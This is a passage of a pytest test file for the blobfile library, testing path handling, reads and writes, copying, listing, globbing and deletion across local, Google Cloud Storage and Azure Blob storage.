warnings.filterwarnings("ignore", category=DeprecationWarning)
warnings.filterwarnings("ignore", category=FutureWarning)
import random
import string
import tempfile
import os
import contextlib
import json
import urllib.request
import hashlib
import time
import subprocess as sp
import multiprocessing as mp
import platform
import pickle
import zipfile
import av
import pytest
from tensorflow.io import gfile
import imageio
import numpy as np
import blobfile as bf
from blobfile import _ops as ops, _azure as azure, _common as common
GCS_TEST_BUCKET = os.getenv("GCS_TEST_BUCKET", "csh-test-3")
AS_TEST_ACCOUNT = os.getenv("AS_TEST_ACCOUNT", "cshteststorage2")
AS_TEST_ACCOUNT2 = os.getenv("AS_TEST_ACCOUNT2", "cshteststorage3")
AS_TEST_CONTAINER = os.getenv("AS_TEST_CONTAINER", "testcontainer2")
AS_TEST_CONTAINER2 = os.getenv("AS_TEST_CONTAINER2", "testcontainer3")
AS_INVALID_ACCOUNT = f"{AS_TEST_ACCOUNT}-does-not-exist"
AS_EXTERNAL_ACCOUNT = "cshteststorage4"
AZURE_VALID_CONTAINER = (
f"https://{AS_TEST_ACCOUNT}.blob.core.windows.net/{AS_TEST_CONTAINER}"
)
AZURE_INVALID_CONTAINER = f"https://{AS_TEST_ACCOUNT}.blob.core.windows.net/{AS_TEST_CONTAINER}-does-not-exist"
AZURE_INVALID_CONTAINER_NO_ACCOUNT = (
f"https://{AS_INVALID_ACCOUNT}.blob.core.windows.net/{AS_TEST_CONTAINER}"
)
GCS_VALID_BUCKET = f"gs://{GCS_TEST_BUCKET}"
GCS_INVALID_BUCKET = f"gs://{GCS_TEST_BUCKET}-does-not-exist"
AZURE_PUBLIC_URL = (
f"https://{AS_EXTERNAL_ACCOUNT}.blob.core.windows.net/publiccontainer/test_cat.png"
)
AZURE_PUBLIC_URL_HEADER = b"\x89PNG"
@pytest.fixture(scope="session", autouse=True)
def setup_gcloud_auth():
# only run this for our docker tests, this tells gcloud to use the credentials supplied by the
# test running script
if platform.system() == "Linux":
sp.run(
[
"gcloud",
"auth",
"activate-service-account",
f"--key-file={os.environ['GOOGLE_APPLICATION_CREDENTIALS']}",
]
)
yield
@contextlib.contextmanager
def chdir(path):
original_path = os.getcwd()
os.chdir(path)
yield
os.chdir(original_path)
@contextlib.contextmanager
def _get_temp_local_path():
with tempfile.TemporaryDirectory() as tmpdir:
assert isinstance(tmpdir, str)
path = os.path.join(tmpdir, "file.name")
yield path
@contextlib.contextmanager
def _get_temp_gcs_path():
path = f"gs://{GCS_TEST_BUCKET}/" + "".join(
random.choice(string.ascii_lowercase) for i in range(16)
)
gfile.mkdir(path)
yield path + "/file.name"
gfile.rmtree(path)
@contextlib.contextmanager
def _get_temp_as_path(account=AS_TEST_ACCOUNT, container=AS_TEST_CONTAINER):
random_id = "".join(random.choice(string.ascii_lowercase) for i in range(16))
path = f"https://{account}.blob.core.windows.net/{container}/" + random_id
yield path + "/file.name"
sp.run(
[
"az",
"storage",
"blob",
"delete-batch",
"--account-name",
account,
"--source",
container,
"--pattern",
f"{random_id}/*",
],
check=True,
shell=platform.system() == "Windows",
)
def _write_contents(path, contents):
if ".blob.core.windows.net" in path:
with tempfile.TemporaryDirectory() as tmpdir:
assert isinstance(tmpdir, str)
account, container, blob = azure.split_path(path)
filepath = os.path.join(tmpdir, "tmp")
with open(filepath, "wb") as f:
f.write(contents)
sp.run(
[
"az",
"storage",
"blob",
"upload",
"--account-name",
account,
"--container-name",
container,
"--name",
blob,
"--file",
filepath,
],
check=True,
shell=platform.system() == "Windows",
stdout=sp.DEVNULL,
stderr=sp.DEVNULL,
)
else:
with gfile.GFile(path, "wb") as f:
f.write(contents)
def _read_contents(path):
if ".blob.core.windows.net" in path:
with tempfile.TemporaryDirectory() as tmpdir:
assert isinstance(tmpdir, str)
account, container, blob = azure.split_path(path)
filepath = os.path.join(tmpdir, "tmp")
sp.run(
[
"az",
"storage",
"blob",
"download",
"--account-name",
account,
"--container-name",
container,
"--name",
blob,
"--file",
filepath,
],
check=True,
shell=platform.system() == "Windows",
stdout=sp.DEVNULL,
stderr=sp.DEVNULL,
)
with open(filepath, "rb") as f:
return f.read()
else:
with gfile.GFile(path, "rb") as f:
return f.read()
def test_basename():
testcases = [
("/", ""),
("a/", ""),
("a", "a"),
("a/b", "b"),
("", ""),
("gs://a", ""),
("gs://a/", ""),
("gs://a/b/", ""),
("gs://a/b", "b"),
("gs://a/b/c/test.filename", "test.filename"),
("https://a.blob.core.windows.net/b", ""),
("https://a.blob.core.windows.net/b/", ""),
("https://a.blob.core.windows.net/b/c/", ""),
("https://a.blob.core.windows.net/b/c", "c"),
("https://a.blob.core.windows.net/b/c/test.filename", "test.filename"),
]
for input_, desired_output in testcases:
actual_output = bf.basename(input_)
assert desired_output == actual_output
def test_dirname():
testcases = [
("a", ""),
("a/b", "a"),
("a/b/c", "a/b"),
("a/b/c/", "a/b/c"),
("a/b/c/////", "a/b/c"),
("", ""),
("gs://a", "gs://a"),
("gs://a/", "gs://a"),
("gs://a/////", "gs://a"),
("gs://a/b", "gs://a"),
("gs://a/b/c/test.filename", "gs://a/b/c"),
("gs://a/b/c/", "gs://a/b"),
("gs://a/b/c/////", "gs://a/b"),
(
"https://a.blob.core.windows.net/container",
"https://a.blob.core.windows.net/container",
),
(
"https://a.blob.core.windows.net/container/",
"https://a.blob.core.windows.net/container",
),
(
"https://a.blob.core.windows.net/container/////",
"https://a.blob.core.windows.net/container",
),
(
"https://a.blob.core.windows.net/container/b",
"https://a.blob.core.windows.net/container",
),
(
"https://a.blob.core.windows.net/container/b/c/test.filename",
"https://a.blob.core.windows.net/container/b/c",
),
(
"https://a.blob.core.windows.net/container/b/c/",
"https://a.blob.core.windows.net/container/b",
),
(
"https://a.blob.core.windows.net/container/b/c//////",
"https://a.blob.core.windows.net/container/b",
),
]
for input_, desired_output in testcases:
actual_output = bf.dirname(input_)
assert desired_output == actual_output, f"{input_}"
def test_join():
testcases = [
("a", "b", "a/b"),
("a/b", "c", "a/b/c"),
("a/b/", "c", "a/b/c"),
("a/b/", "c/", "a/b/c/"),
("a/b/", "/c/", "/c/"),
("", "", ""),
# this doesn't work with : in the second path
(
"gs://a/b/c",
"d0123456789-._~!$&'()*+,;=@",
"gs://a/b/c/d0123456789-._~!$&'()*+,;=@",
),
("gs://a", "b", "gs://a/b"),
("gs://a/b", "c", "gs://a/b/c"),
("gs://a/b/", "c", "gs://a/b/c"),
("gs://a/b/", "c/", "gs://a/b/c/"),
("gs://a/b/", "/c/", "gs://a/c/"),
("gs://a/b/", "../c", "gs://a/c"),
("gs://a/b/", "../c/", "gs://a/c/"),
("gs://a/b/", "../../c/", "gs://a/c/"),
(
"https://a.blob.core.windows.net/container",
"b",
"https://a.blob.core.windows.net/container/b",
),
(
"https://a.blob.core.windows.net/container/b",
"c",
"https://a.blob.core.windows.net/container/b/c",
),
(
"https://a.blob.core.windows.net/container/b/",
"c",
"https://a.blob.core.windows.net/container/b/c",
),
(
"https://a.blob.core.windows.net/container/b/",
"c/",
"https://a.blob.core.windows.net/container/b/c/",
),
(
"https://a.blob.core.windows.net/container/b/",
"/c/",
"https://a.blob.core.windows.net/container/c/",
),
(
"https://a.blob.core.windows.net/container/b/",
"../c",
"https://a.blob.core.windows.net/container/c",
),
(
"https://a.blob.core.windows.net/container/b/",
"../c/",
"https://a.blob.core.windows.net/container/c/",
),
(
"https://a.blob.core.windows.net/container/b/",
"../../c/",
"https://a.blob.core.windows.net/container/c/",
),
("gs://test/a/b", "c:d", "gs://test/a/b/c:d"),
]
for input_a, input_b, desired_output in testcases:
actual_output = bf.join(input_a, input_b)
assert desired_output == actual_output, f"{input_a} {input_b}"
# also make sure az:// urls work
if "blob.core.windows.net" in input_a:
az_input_a = _convert_https_to_az(input_a)
actual_output = bf.join(az_input_a, input_b)
assert desired_output == actual_output, f"{az_input_a} {input_b}"
def _convert_https_to_az(path):
return path.replace("https://", "az://").replace(".blob.core.windows.net", "")
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_get_url(ctx):
contents = b"meow!"
with ctx() as path:
_write_contents(path, contents)
url, _ = bf.get_url(path)
assert urllib.request.urlopen(url).read() == contents
def test_azure_public_get_url():
contents = urllib.request.urlopen(AZURE_PUBLIC_URL).read()
assert contents.startswith(AZURE_PUBLIC_URL_HEADER)
url, _ = bf.get_url(AZURE_PUBLIC_URL)
assert urllib.request.urlopen(url).read() == contents
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
@pytest.mark.parametrize("streaming", [True, False])
def test_read_write(ctx, streaming):
contents = b"meow!\npurr\n"
with ctx() as path:
path = bf.join(path, "a folder", "a.file")
bf.makedirs(bf.dirname(path))
with bf.BlobFile(path, "wb", streaming=streaming) as w:
w.write(contents)
assert w.tell() == len(contents)
with bf.BlobFile(path, "rb", streaming=streaming) as r:
assert r.read() == contents
assert r.tell() == len(contents)
with bf.BlobFile(path, "rb", streaming=streaming) as r:
lines = list(r)
assert b"".join(lines) == contents
@pytest.mark.parametrize("ctx", [_get_temp_gcs_path, _get_temp_as_path])
def test_zipfile(ctx):
contents = b"meow!\npurr\n"
with ctx() as path:
with bf.BlobFile(path, "wb", streaming=True) as f:
with zipfile.ZipFile(f, "w") as zf:
with zf.open("eggs.txt", "w") as myfile:
myfile.write(contents)
with bf.BlobFile(path, "rb", streaming=True) as f:
with zipfile.ZipFile(f, "r") as zf:
with zf.open("eggs.txt", "r") as myfile:
assert myfile.read() == contents
def test_az_path():
contents = b"meow!\npurr\n"
with _get_temp_as_path() as path:
path = _convert_https_to_az(path)
path = bf.join(path, "a folder", "a.file")
path = _convert_https_to_az(path)
bf.makedirs(_convert_https_to_az(bf.dirname(path)))
with bf.BlobFile(path, "wb") as w:
w.write(contents)
with bf.BlobFile(path, "rb") as r:
assert r.read() == contents
with bf.BlobFile(path, "rb") as r:
lines = list(r)
assert b"".join(lines) == contents
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_append(ctx):
contents = b"meow!\n"
additional_contents = b"purr\n"
with ctx() as path:
with bf.BlobFile(path, "ab", streaming=False) as w:
w.write(contents)
with bf.BlobFile(path, "ab", streaming=False) as w:
w.write(additional_contents)
with bf.BlobFile(path, "rb") as r:
assert r.read() == contents + additional_contents
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_stat(ctx):
contents = b"meow!"
with ctx() as path:
_write_contents(path, contents)
s = bf.stat(path)
assert s.size == len(contents)
assert abs(time.time() - s.mtime) <= 20
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_set_mtime(ctx):
contents = b"meow!"
with ctx() as path:
_write_contents(path, contents)
s = bf.stat(path)
assert abs(time.time() - s.mtime) <= 20
new_mtime = 1
assert bf.set_mtime(path, new_mtime)
assert bf.stat(path).mtime == new_mtime
@pytest.mark.parametrize("ctx", [_get_temp_as_path])
def test_azure_metadata(ctx):
# make sure metadata is preserved when opening a file for writing
# which clears uncommitted blocks
contents = b"meow!"
with ctx() as path:
with bf.BlobFile(path, "wb") as f:
f.write(contents)
bf.set_mtime(path, 1)
time.sleep(5)
with bf.BlobFile(path, "wb", streaming=True) as f:
st = bf.stat(path)
assert st.mtime == 1
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_remove(ctx):
contents = b"meow!"
with ctx() as path:
_write_contents(path, contents)
assert bf.exists(path)
bf.remove(path)
assert not bf.exists(path)
@pytest.mark.parametrize(
# don't test local path because that has slightly different behavior
"ctx",
[_get_temp_gcs_path, _get_temp_as_path],
)
def test_rmdir(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
# this is an error for a local path but not for a blob path
bf.rmdir(bf.join(dirpath, "fakedirname"))
new_dirpath = bf.join(dirpath, "dirname")
bf.makedirs(new_dirpath)
assert bf.exists(new_dirpath)
bf.rmdir(new_dirpath)
assert not bf.exists(new_dirpath)
# double delete is fine
bf.rmdir(new_dirpath)
# implicit dir
new_filepath = bf.join(dirpath, "dirname", "name")
_write_contents(new_filepath, contents)
with pytest.raises(OSError):
# not empty dir
bf.rmdir(new_dirpath)
bf.remove(new_filepath)
bf.rmdir(new_dirpath)
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_makedirs(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.join(path, "x", "x", "x")
bf.makedirs(dirpath)
assert bf.exists(dirpath)
_write_contents(bf.join(dirpath, "testfile"), contents)
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_isdir(ctx):
contents = b"meow!"
with ctx() as path:
assert not bf.isdir(path)
_write_contents(path, contents)
assert not bf.isdir(path)
dirpath = path + ".dir"
bf.makedirs(dirpath)
assert bf.isdir(dirpath)
assert not bf.isdir(dirpath[:-1])
filepath = bf.join(path + ".otherdir", "subdir", "file.name")
if "://" not in path:
# implicit directory
bf.makedirs(bf.dirname(filepath))
dirpath = bf.dirname(bf.dirname(filepath))
_write_contents(filepath, contents)
assert bf.isdir(dirpath)
assert not bf.isdir(dirpath[:-1])
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_listdir(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
bf.makedirs(dirpath)
a_path = bf.join(dirpath, "a")
with bf.BlobFile(a_path, "wb") as w:
w.write(contents)
b_path = bf.join(dirpath, "b")
with bf.BlobFile(b_path, "wb") as w:
w.write(contents)
bf.makedirs(bf.join(dirpath, "c"))
expected = ["a", "b", "c"]
assert sorted(list(bf.listdir(dirpath))) == expected
dirpath = _convert_https_to_az(dirpath)
assert sorted(list(bf.listdir(dirpath))) == expected
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_scandir(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
a_path = bf.join(dirpath, "a")
with bf.BlobFile(a_path, "wb") as w:
w.write(contents)
b_path = bf.join(dirpath, "b")
with bf.BlobFile(b_path, "wb") as w:
w.write(contents)
bf.makedirs(bf.join(dirpath, "c"))
entries = sorted(list(bf.scandir(dirpath)))
assert [e.name for e in entries] == ["a", "b", "c"]
assert [e.path for e in entries] == [
bf.join(dirpath, name) for name in ["a", "b", "c"]
]
assert [e.is_dir for e in entries] == [False, False, True]
assert [e.is_file for e in entries] == [True, True, False]
assert entries[0].stat.size == len(contents)
assert entries[1].stat.size == len(contents)
assert entries[2].stat is None
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_listdir_sharded(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
with bf.BlobFile(bf.join(dirpath, "a"), "wb") as w:
w.write(contents)
with bf.BlobFile(bf.join(dirpath, "aa"), "wb") as w:
w.write(contents)
with bf.BlobFile(bf.join(dirpath, "b"), "wb") as w:
w.write(contents)
with bf.BlobFile(bf.join(dirpath, "ca"), "wb") as w:
w.write(contents)
bf.makedirs(bf.join(dirpath, "c"))
with bf.BlobFile(bf.join(dirpath, "c/a"), "wb") as w:
w.write(contents)
# this should also test shard_prefix_length=2 but that takes too long
assert sorted(list(bf.listdir(dirpath, shard_prefix_length=1))) == [
"a",
"aa",
"b",
"c",
"ca",
]
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
@pytest.mark.parametrize("topdown", [False, True])
def test_walk(ctx, topdown):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
a_path = bf.join(dirpath, "a")
with bf.BlobFile(a_path, "wb") as w:
w.write(contents)
bf.makedirs(bf.join(dirpath, "c/d"))
b_path = bf.join(dirpath, "c/d/b")
with bf.BlobFile(b_path, "wb") as w:
w.write(contents)
expected = [
(dirpath, ["c"], ["a"]),
(bf.join(dirpath, "c"), ["d"], []),
(bf.join(dirpath, "c", "d"), [], ["b"]),
]
if not topdown:
expected = list(reversed(expected))
assert list(bf.walk(dirpath, topdown=topdown)) == expected
dirpath = _convert_https_to_az(dirpath)
assert list(bf.walk(dirpath, topdown=topdown)) == expected
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
@pytest.mark.parametrize("parallel", [False, True])
def test_glob(ctx, parallel):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
a_path = bf.join(dirpath, "ab")
with bf.BlobFile(a_path, "wb") as w:
w.write(contents)
b_path = bf.join(dirpath, "bb")
with bf.BlobFile(b_path, "wb") as w:
w.write(contents)
def assert_listing_equal(path, desired):
desired = sorted([bf.join(dirpath, p) for p in desired])
actual = sorted(list(bf.glob(path, parallel=parallel)))
assert actual == desired, f"{actual} != {desired}"
assert_listing_equal(bf.join(dirpath, "*b"), ["ab", "bb"])
assert_listing_equal(bf.join(dirpath, "a*"), ["ab"])
assert_listing_equal(bf.join(dirpath, "ab*"), ["ab"])
assert_listing_equal(bf.join(dirpath, "*"), ["ab", "bb"])
assert_listing_equal(bf.join(dirpath, "bb"), ["bb"])
path = bf.join(dirpath, "test.txt")
with bf.BlobFile(path, "wb") as w:
w.write(contents)
path = bf.join(dirpath, "subdir", "test.txt")
bf.makedirs(bf.dirname(path))
with bf.BlobFile(path, "wb") as f:
f.write(contents)
path = bf.join(dirpath, "subdir", "subsubdir", "test.txt")
if "://" not in path:
# implicit directory
bf.makedirs(bf.dirname(path))
with bf.BlobFile(path, "wb") as f:
f.write(contents)
assert_listing_equal(bf.join(dirpath, "*/test.txt"), ["subdir/test.txt"])
assert_listing_equal(bf.join(dirpath, "*/*.txt"), ["subdir/test.txt"])
if "://" in path:
# local glob doesn't handle ** the same way as remote glob
assert_listing_equal(
bf.join(dirpath, "**.txt"),
["test.txt", "subdir/test.txt", "subdir/subsubdir/test.txt"],
)
else:
assert_listing_equal(bf.join(dirpath, "**.txt"), ["test.txt"])
assert_listing_equal(bf.join(dirpath, "*/test"), [])
assert_listing_equal(bf.join(dirpath, "subdir/test.txt"), ["subdir/test.txt"])
# directories
assert_listing_equal(bf.join(dirpath, "*"), ["ab", "bb", "subdir", "test.txt"])
assert_listing_equal(bf.join(dirpath, "subdir"), ["subdir"])
assert_listing_equal(bf.join(dirpath, "subdir/"), ["subdir"])
assert_listing_equal(bf.join(dirpath, "*/"), ["subdir"])
assert_listing_equal(bf.join(dirpath, "*dir"), ["subdir"])
assert_listing_equal(bf.join(dirpath, "subdir/*dir"), ["subdir/subsubdir"])
assert_listing_equal(bf.join(dirpath, "subdir/*dir/"), ["subdir/subsubdir"])
assert_listing_equal(bf.join(dirpath, "su*ir/*dir/"), ["subdir/subsubdir"])
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_scanglob(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
a_path = bf.join(dirpath, "ab")
with bf.BlobFile(a_path, "wb") as w:
w.write(contents)
b_path = bf.join(dirpath, "bb")
with bf.BlobFile(b_path, "wb") as w:
w.write(contents)
path = bf.join(dirpath, "test.txt")
with bf.BlobFile(path, "wb") as w:
w.write(contents)
path = bf.join(dirpath, "subdir", "test.txt")
bf.makedirs(bf.dirname(path))
with bf.BlobFile(path, "wb") as f:
f.write(contents)
entries = sorted(list(bf.scanglob(bf.join(dirpath, "*b*"))))
assert entries[0].name == "ab" and entries[0].is_file
assert entries[1].name == "bb" and entries[1].is_file
assert entries[2].name == "subdir" and entries[2].is_dir
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_rmtree(ctx):
contents = b"meow!"
with ctx() as path:
root = bf.dirname(path)
destroy_path = bf.join(root, "destroy")
bf.makedirs(destroy_path)
save_path = bf.join(root, "save")
bf.makedirs(save_path)
# implicit dir
if not "://" in path:
bf.makedirs(bf.join(destroy_path, "adir"))
with bf.BlobFile(bf.join(destroy_path, "adir/b"), "wb") as w:
w.write(contents)
# explicit dir
bf.makedirs(bf.join(destroy_path, "bdir"))
with bf.BlobFile(bf.join(destroy_path, "bdir/b"), "wb") as w:
w.write(contents)
bf.makedirs(bf.join(save_path, "somedir"))
with bf.BlobFile(bf.join(save_path, "somefile"), "wb") as w:
w.write(contents)
def assert_listing_equal(path, desired):
actual = list(bf.walk(path))
# ordering of os walk is weird, only compare sorted order
assert sorted(actual) == sorted(desired), f"{actual} != {desired}"
assert_listing_equal(
root,
[
(root, ["destroy", "save"], []),
(destroy_path, ["adir", "bdir"], []),
(bf.join(destroy_path, "adir"), [], ["b"]),
(bf.join(destroy_path, "bdir"), [], ["b"]),
(save_path, ["somedir"], ["somefile"]),
(bf.join(save_path, "somedir"), [], []),
],
)
bf.rmtree(destroy_path)
assert_listing_equal(
root,
[
(root, ["save"], []),
(save_path, ["somedir"], ["somefile"]),
(bf.join(save_path, "somedir"), [], []),
],
)
@pytest.mark.parametrize("parallel", [False, True])
def test_copy(parallel):
contents = b"meow!"
with _get_temp_local_path() as local_path1, _get_temp_local_path() as local_path2, _get_temp_local_path() as local_path3, _get_temp_gcs_path() as gcs_path1, _get_temp_gcs_path() as gcs_path2, _get_temp_as_path() as as_path1, _get_temp_as_path() as as_path2, _get_temp_as_path(
account=AS_TEST_ACCOUNT2, container=AS_TEST_CONTAINER2
) as as_path3, _get_temp_as_path() as as_path4:
with pytest.raises(FileNotFoundError):
bf.copy(gcs_path1, gcs_path2, parallel=parallel)
with pytest.raises(FileNotFoundError):
bf.copy(as_path1, as_path2, parallel=parallel)
_write_contents(local_path1, contents)
testcases = [
(local_path1, local_path2),
(local_path1, gcs_path1),
(gcs_path1, gcs_path2),
(gcs_path2, as_path1),
(as_path1, as_path2),
(as_path2, as_path3),
(as_path3, local_path3),
(local_path3, as_path4),
]
for src, dst in testcases:
h = bf.copy(src, dst, return_md5=True, parallel=parallel)
assert h == hashlib.md5(contents).hexdigest()
assert _read_contents(dst) == contents
with pytest.raises(FileExistsError):
bf.copy(src, dst, parallel=parallel)
bf.copy(src, dst, overwrite=True, parallel=parallel)
assert _read_contents(dst) == contents
# the tests already take awhile and this adds like a minute
@pytest.mark.slow
@pytest.mark.parametrize("ctx", [_get_temp_gcs_path, _get_temp_as_path])
def test_parallel_copy_large_file(ctx):
contents = b"meow!" * common.PARALLEL_COPY_MINIMUM_PART_SIZE + b"meow???"
with ctx() as remote_path:
with tempfile.TemporaryDirectory() as tmpdir:
local_path = os.path.join(tmpdir, "test.txt")
with open(local_path, "wb") as f:
f.write(contents)
bf.copy(local_path, remote_path, parallel=True)
assert _read_contents(remote_path) == contents
with tempfile.TemporaryDirectory() as tmpdir:
local_path = os.path.join(tmpdir, "test.txt")
bf.copy(remote_path, local_path, parallel=True)
assert _read_contents(local_path) == contents
def test_copy_azure_public():
with _get_temp_as_path() as dst:
bf.copy(AZURE_PUBLIC_URL, dst)
assert _read_contents(dst)[:4] == AZURE_PUBLIC_URL_HEADER
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_exists(ctx):
contents = b"meow!"
with ctx() as path:
assert not bf.exists(path)
_write_contents(path, contents)
assert bf.exists(path)
def test_concurrent_write_gcs():
with _get_temp_gcs_path() as path:
outer_contents = b"miso" * (2 ** 20 + 1)
inner_contents = b"momo" * (2 ** 20 + 1)
with bf.BlobFile(path, "wb", streaming=True) as f:
f.write(outer_contents)
with bf.BlobFile(path, "wb", streaming=True) as f:
f.write(inner_contents)
# the outer write will finish last and overwrite the inner one
# the last writer to finish wins with this setup
with bf.BlobFile(path, "rb") as f:
assert f.read() == outer_contents
def test_concurrent_write_as():
with _get_temp_as_path() as path:
bf.configure(azure_write_chunk_size=2 ** 20)
outer_contents = b"miso" * (2 ** 20 + 1)
inner_contents = b"momo" * (2 ** 20 + 1)
# the inner write will invalidate the outer one, the last writer
# to start wins with this setup
with pytest.raises(bf.ConcurrentWriteFailure):
with bf.BlobFile(path, "wb", streaming=True) as f:
f.write(outer_contents)
with bf.BlobFile(path, "wb", streaming=True) as f:
f.write(inner_contents)
# the outer write will finish last and overwrite the inner one
with bf.BlobFile(path, "rb") as f:
assert f.read() == inner_contents
bf.configure()
@contextlib.contextmanager
def environ_context():
env = os.environ.copy()
yield
os.environ = env
def test_more_exists():
testcases = [
(AZURE_INVALID_CONTAINER, False),
(AZURE_INVALID_CONTAINER + "/", False),
(AZURE_INVALID_CONTAINER + "//", False),
(AZURE_INVALID_CONTAINER + "/invalid.file", False),
(GCS_INVALID_BUCKET, False),
(GCS_INVALID_BUCKET + "/", False),
(GCS_INVALID_BUCKET + "//", False),
(GCS_INVALID_BUCKET + "/invalid.file", False),
(AZURE_INVALID_CONTAINER_NO_ACCOUNT, False),
(AZURE_INVALID_CONTAINER_NO_ACCOUNT + "/", False),
(AZURE_INVALID_CONTAINER_NO_ACCOUNT + "//", False),
(AZURE_INVALID_CONTAINER_NO_ACCOUNT + "/invalid.file", False),
(AZURE_VALID_CONTAINER, True),
(AZURE_VALID_CONTAINER + "/", True),
(AZURE_VALID_CONTAINER + "//", False),
(AZURE_VALID_CONTAINER + "/invalid.file", False),
(GCS_VALID_BUCKET, True),
(GCS_VALID_BUCKET + "/", True),
(GCS_VALID_BUCKET + "//", False),
(GCS_VALID_BUCKET + "/invalid.file", False),
(f"/does-not-exist", False),
(f"/", True),
]
for path, should_exist in testcases:
assert bf.exists(path) == should_exist
@pytest.mark.parametrize(
"base_path",
[AZURE_INVALID_CONTAINER_NO_ACCOUNT, AZURE_INVALID_CONTAINER, GCS_INVALID_BUCKET],
)
def test_invalid_paths(base_path):
for suffix in ["", "/", "//", "/invalid.file", "/invalid/dir/"]:
path = base_path + suffix
print(path)
if path.endswith("/"):
expected_error = IsADirectoryError
else:
expected_error = FileNotFoundError
list(bf.glob(path))
if suffix == "":
for pattern in ["*", "**"]:
try:
list(bf.glob(path + pattern))
except bf.Error as e:
assert "Wildcards cannot be used" in e.message
else:
for pattern in ["*", "**"]:
list(bf.glob(path + pattern))
with pytest.raises(FileNotFoundError):
list(bf.listdir(path))
assert not bf.exists(path)
assert not bf.isdir(path)
with pytest.raises(expected_error):
bf.remove(path)
if suffix in ("", "/"):
try:
bf.rmdir(path)
except bf.Error as e:
assert "Cannot delete bucket" in e.message
else:
bf.rmdir(path)
with pytest.raises(NotADirectoryError):
bf.rmtree(path)
with pytest.raises(FileNotFoundError):
bf.stat(path)
if base_path == AZURE_INVALID_CONTAINER_NO_ACCOUNT:
with pytest.raises(bf.Error):
bf.get_url(path)
else:
bf.get_url(path)
with pytest.raises(FileNotFoundError):
bf.md5(path)
with pytest.raises(bf.Error):
bf.makedirs(path)
list(bf.walk(path))
with tempfile.TemporaryDirectory() as tmpdir:
local_path = os.path.join(tmpdir, "test.txt")
with pytest.raises(expected_error):
bf.copy(path, local_path)
with open(local_path, "w") as f:
f.write("meow")
with pytest.raises(expected_error):
bf.copy(local_path, path)
for streaming in [False, True]:
with pytest.raises(expected_error):
with bf.BlobFile(path, "rb", streaming=streaming) as f:
f.read()
with pytest.raises(expected_error):
with bf.BlobFile(path, "wb", streaming=streaming) as f:
f.write(b"meow")
@pytest.mark.parametrize("buffer_size", [1, 100])
@pytest.mark.parametrize("ctx", [_get_temp_gcs_path, _get_temp_as_path])
def test_read_stats(buffer_size, ctx):
with ctx() as path:
contents = b"meow!"
with bf.BlobFile(path, "wb") as w:
w.write(contents)
with bf.BlobFile(path, "rb", buffer_size=buffer_size) as r:
r.read(1)
if buffer_size == 1:
assert r.raw.bytes_read == 1 # type: ignore
else:
assert r.raw.bytes_read == len(contents) # type: ignore
with bf.BlobFile(path, "rb", buffer_size=buffer_size) as r:
r.read(1)
r.seek(4)
r.read(1)
r.seek(1000000)
assert r.read(1) == b""
if buffer_size == 1:
assert r.raw.requests == 2 # type: ignore
assert r.raw.bytes_read == 2 # type: ignore
else:
assert r.raw.requests == 1 # type: ignore
assert r.raw.bytes_read == len(contents) # type: ignore
@pytest.mark.parametrize("ctx", [_get_temp_gcs_path, _get_temp_as_path])
def test_cache_dir(ctx):
cache_dir = tempfile.mkdtemp()
contents = b"meow!"
alternative_contents = b"purr!"
with ctx() as path:
with bf.BlobFile(path, mode="wb") as f:
f.write(contents)
with bf.BlobFile(path, mode="rb", streaming=False, cache_dir=cache_dir) as f:
assert f.read() == contents
content_hash = hashlib.md5(contents).hexdigest()
cache_path = bf.join(cache_dir, content_hash, bf.basename(path))
with open(cache_path, "rb") as f:
assert f.read() == contents
# alter the cached file to make sure we are not re-reading the remote file
with open(cache_path, "wb") as f:
f.write(alternative_contents)
with bf.BlobFile(path, mode="rb", streaming=False, cache_dir=cache_dir) as f:
assert f.read() == alternative_contents
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
@pytest.mark.parametrize("use_random", [False, True])
def test_change_file_size(ctx, use_random):
chunk_size = 8 * 2 ** 20
long_contents = b"\x00" * chunk_size * 3
short_contents = b"\xFF" * chunk_size * 2
if use_random:
long_contents = os.urandom(len(long_contents))
short_contents = os.urandom(len(short_contents))
with ctx() as path:
# make file shorter
with bf.BlobFile(path, "wb") as f:
f.write(long_contents)
with bf.BlobFile(path, "rb") as f:
read_contents = f.read(chunk_size)
with bf.BlobFile(path, "wb") as f2:
f2.write(short_contents)
# close underlying connection
f.raw._f = None # type: ignore
